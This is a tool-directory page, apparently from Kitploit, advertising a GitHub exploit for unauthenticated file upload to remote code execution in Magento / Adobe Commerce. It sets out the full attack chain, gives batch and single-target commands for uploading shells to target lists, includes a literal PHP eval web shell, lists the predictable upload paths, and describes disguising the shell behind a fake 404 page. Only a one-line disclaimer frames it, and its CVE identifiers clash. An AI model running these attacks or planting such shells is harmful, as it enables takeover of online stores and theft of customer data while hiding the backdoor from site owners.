Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/amkkk221/cve-2025-43990-magento-rce
Web Vulnerability ScannersPayload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration Testing
GitHubamkkk221/cve-2025-43990-magento-rce

CVE-2025-43990-Magento-RCE

Magento APSB25-94 Unauthenticated File Upload to RCE (CVE-2026-XXXX) - Eval Shell + Probe Scanner

View Repository
35 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Magento APSB25-94 — Unauthenticated File Upload to RCE

Overview

Exploits unauthenticated file upload in Magento / Adobe Commerce via REST API guest cart custom_options file upload.

Attack Chain

root@kitploit:~
1. GraphQL → leak product SKU
2. REST API → create guest cart
3. REST API → upload PNG polyshell via custom_options file_info
4. HTTP GET → access .php at predictable path
5. PHP exec → RCE

Tools

magento_godzilla.py — Batch Scanner

Two-phase upload: probe file (WAF-safe) + eval shell (404 camouflage).

root@kitploit:~
pip install requests
python magento_godzilla.py -f urls.txt -t 20 -o results.txt

Output: RCE_CONFIRMED, SHELL_KILLED, PROBE_ONLY

magento_upload.py — Single Target Upload

root@kitploit:~
python magento_upload.py -u https://target.com -f godzilla.php
python magento_upload.py -u https://target.com -c '<?php eval($_POST[1]);?>'
python magento_upload.py -u https://target.com -f shell.php --raw

Upload Paths

root@kitploit:~
/pub/media/custom_options/quote/{c1}/{c2}/{filename}
/media/custom_options/quote/{c1}/{c2}/{filename}

Shell Camouflage

GET returns fake 404 (HTTP 200 + "Not Found" body). POST with password param executes code.

Disclaimer

For authorized security testing only.

Download Tool